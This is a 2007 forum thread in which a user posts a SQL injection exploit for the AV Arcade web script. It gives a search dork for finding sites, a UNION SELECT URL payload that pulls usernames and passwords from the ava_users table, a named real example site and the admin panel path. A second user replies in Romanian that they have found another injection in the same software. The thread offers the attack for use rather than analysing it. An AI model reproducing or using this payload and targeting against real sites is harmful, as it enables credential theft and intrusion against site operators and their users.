Ras Posted July 1, 2007 Report Posted July 1, 2007 Site : [url]www.avscripts.net[/url]Dork : "Powered By AV Arcade"Exploit: http://site.com/index.php?cat_id=NumOfCatgorey/**/union/**/select/**/1,concat(char(32,%2032,%2032,%2032,%2032,%2032,%2032,%2032,32,32,32,32,32),username,char(58,58,58),password)/**/from/**/ava_users/**/where%20id=UidExample: [url]http://www.gotovski.cool-bg.co.uk[/url]Admin Panel : site.com/admin/Found By : WaReZ Quote
kw3rln Posted July 1, 2007 Report Posted July 1, 2007 si io am un sql injection in softu asta da altundeva ..trebuie sal public si io Quote
